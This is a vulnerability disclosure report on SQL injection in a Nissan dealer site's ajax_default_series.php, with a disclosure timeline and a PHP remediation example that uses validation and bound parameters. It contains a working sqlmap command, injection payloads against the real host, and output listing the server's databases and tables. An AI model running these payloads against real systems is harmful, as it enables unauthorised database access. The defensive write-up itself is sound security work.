2015-11-24: Details sent to the vendor; awaiting vendor handling
2015-11-24: Vendor has confirmed; details disclosed to the vendor only
2015-12-04: Details disclosed to core white hats and experts in the relevant field
2015-12-14: Details disclosed to ordinary white hats
2015-12-24: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public
```
# sqlmap -u "http://anhui.zznissan.com.cn//ajax_default_series.php?models=(select%201%20and%20row(1%2c1)%3E(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(85)%2cCHAR(87)%2cCHAR(66)%2cCHAR(121)%2cCHAR(103)%2cCHAR(55)%2cCHAR(120)%2cCHAR(87))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))" --level=5 --risk=3
```

Cross-database queries are possible (the application's database account can read other schemas on the same server).
```text
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
    Payload: http://anhui.zznissan.com.cn:80//ajax_default_series.php?models=-3995 OR (SELECT 5906 FROM(SELECT COUNT(*),CONCAT(0x7168686971,(SELECT (CASE WHEN (5906=5906) THEN 1 ELSE 0 END)),0x71636b7971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- WpzQ),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(85),CHAR(87),CHAR(66),CHAR(121),CHAR(103),CHAR(55),CHAR(120),CHAR(87)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

    Type: UNION query
    Title: MySQL UNION query (random number) - 2 columns
    Payload: http://anhui.zznissan.com.cn:80//ajax_default_series.php?models=-6888 UNION ALL SELECT 8302,CONCAT(0x7168686971,0x786c6159636e7a504752,0x71636b7971),8302#),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(85),CHAR(87),CHAR(66),CHAR(121),CHAR(103),CHAR(55),CHAR(120),CHAR(87)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: http://anhui.zznissan.com.cn:80//ajax_default_series.php?models=-1073 OR 2522=SLEEP(5)-- FZBc),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(85),CHAR(87),CHAR(66),CHAR(121),CHAR(103),CHAR(55),CHAR(120),CHAR(87)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
---
web application technology: Apache
back-end DBMS: MySQL 5.0
current database: 'zznissan_pro'

available databases [41]:
[*] club_15
[*] ebuy
[*] ebuy1217
[*] events
[*] events_2014cgr
[*] events_2014five
[*] events_pickupStory
[*] ezznissan
[*] information_schema
[*] innodb
[*] jinzhiwen
[*] maintain
[*] mysql
[*] nissan
[*] nissan_2015cgr
[*] nissan_jxs
[*] nissan_patrol
[*] nissanmedia
[*] nissantest
[*] paladin
[*] paladinclub
[*] paladinclubtemp
[*] palaqi
[*] performance_schema
[*] specialcar
[*] test
[*] topic
[*] tower_15
[*] wqw_five
[*] wqw_mx6gc
[*] wqw_succk
[*] xuhui
[*] yaguan
[*] zznissan
[*] zznissan_eng
[*] zznissan_jnds
[*] zznissan_lms2015
[*] zznissan_mx6sj2015
[*] zznissan_mx6tg2015
[*] zznissan_pro
[*] zznissanbak

Database: zznissan
[78 tables]
+-------------------+
| Recruitment       |
| user              |
| act_article       |
| act_category      |
| article           |
| article1029       |
| brandpicture      |
| car_adimg         |
| car_brand         |
| car_carimg        |
| car_config        |
| car_detail        |
| car_drive         |
| car_drivehouse    |
| car_getinfo       |
| car_leixing       |
| car_models        |
| car_modelsinfo    |
| car_norms         |
| car_parameter     |
| car_seat          |
| car_series        |
| car_seriesinfo    |
| car_spec          |
| car_speed         |
| car_standard      |
| car_structure     |
| car_user          |
| car_userfun       |
| car_usergroup     |
| car_view          |
| category          |
| department        |
| displacement      |
| downcategory      |
| download          |
| dqcategory        |
| ecatalog          |
| energy_config     |
| energy_detail     |
| energy_images     |
| energy_memory     |
| energy_notice     |
| energy_parameter  |
| energy_picture    |
| energy_series     |
| energy_seriesinfo |
| energy_video      |
| energy_view       |
| feedback          |
| get_active        |
| imagefile         |
| imgcategory       |
| jxs_getinfo       |
| login_record      |
| memory            |
| mobilepicture     |
| mx6_dealer        |
| mx6_testdrive     |
| mx6_user          |
| picture           |
| price             |
| purecategory      |
| puregoods         |
| rencai            |
| service           |
| service_bak       |
| sessions          |
| survey            |
| telents           |
| topic             |
| userfun           |
| usergroup         |
| view_Carprice     |
| view_models       |
| view_models_test  |
| view_parameter    |
| zhaopin           |
+-------------------+
```
Fix: filter the relevant parameters (validate the `models` value before it reaches the SQL statement, and pass it to the database as a bound parameter rather than as query text).
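Added example, not the site's code: the original ajax_default_series.php handler is not on the page, so the vulnerable function below reconstructs the pattern the payloads imply (the raw `models` value spliced into the SQL), and the hardened function shows what "filter the relevant parameters" means in practice: validate `models` as an integer and bind it. The table car_series, its columns, the assumption that `models` is a numeric id, and the DSN and credentials are all assumptions.

```php
<?php
// Added example, not the site's code. Assumes ajax_default_series.php takes a
// numeric series id in ?models= and looks it up in a table assumed to be
// car_series with columns id, name and models (hypothetical names).

// Vulnerable pattern: the raw query-string value is spliced into the SQL text.
// A value like "-1073 OR 2522=SLEEP(5)-- x" or "(select 1 and row(1,1)>(...))"
// becomes part of the statement, which is what the sqlmap output above shows.
function find_series_vulnerable(PDO $db, string $models): ?array
{
    $sql = "SELECT id, name FROM car_series WHERE models = " . $models;
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened form: validate the type before it reaches SQL, then bind the value
// so the database receives it as data rather than as statement text.
function find_series_safe(PDO $db, string $models): ?array
{
    // Anything that is not a plain positive integer is rejected outright, so
    // "-3995 OR (SELECT ..." and "-6888 UNION ALL SELECT ..." never reach SQL.
    $id = filter_var($models, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    $stmt = $db->prepare("SELECT id, name FROM car_series WHERE models = ?");
    $stmt->bindValue(1, $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Emulated prepares are disabled so MySQL itself parses the placeholder.
// DSN, user and password are placeholders.
$db = new PDO(
    'mysql:host=localhost;dbname=zznissan_pro;charset=utf8mb4',
    'APP_USER_PLACEHOLDER',
    'PASSWORD_PLACEHOLDER',
    [
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]
);

header('Content-Type: application/json');
echo json_encode(find_series_safe($db, $_GET['models'] ?? ''));
```

The `available databases [41]` result also shows the application account could read every schema on the server, so alongside the code fix a dedicated MySQL user granted only on zznissan_pro limits what any future injection can reach.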
Severity: Medium
Vulnerability Rank: 8
Confirmed at: 2015-11-24 16:59
The vulnerability has been confirmed to exist; thank you for your attention.
None yet.